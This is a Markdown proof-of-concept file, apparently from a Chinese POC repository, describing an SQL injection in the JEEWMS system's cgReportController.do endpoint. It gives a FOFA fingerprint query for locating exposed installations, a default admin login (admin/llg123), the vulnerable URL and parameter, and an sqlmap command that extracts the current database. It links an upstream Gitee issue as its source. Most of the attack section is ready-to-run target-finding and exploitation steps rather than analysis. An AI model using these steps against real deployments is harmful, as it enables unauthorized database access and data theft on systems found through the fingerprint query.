POC/wpoc/JEEWMS/JEEWMS系统cgReportController.do存在SQL注入漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

32 lines
830 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# JEEWMS系统cgReportController.do存在SQL注入漏洞
JEEWMS系统cgReportController.do存在SQL注入漏洞
## fofa
```javascript
body="plug-in/lhgDialog/lhgdialog.min.js?skin=metro"
```
## poc
1. 构建 POC登录后端捕获数据包并替换 cookie
```javascript
admin/llg123
http://localhost:8083/jeewms/cgReportController.do?list&id=1
```
1. 使用 SQLMAP 重现和构造执行语句
```javascript
python sqlmap.py -u "http://localhost:8083/jeewms/cgReportController.do?list&id=1" --cookie="XXXXX" -p id --current-db
```
![输入图片说明](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202502211356436.png)
## 漏洞来源
- [JEEWMS-cgReportController.doList&ID 存在 SQL 注入漏洞 ·问题 #IBFTVK ·JeeWMS/JeeWMS - Gitee.com](https://gitee.com/erzhongxmu/JEEWMS/issues/IBFTVK)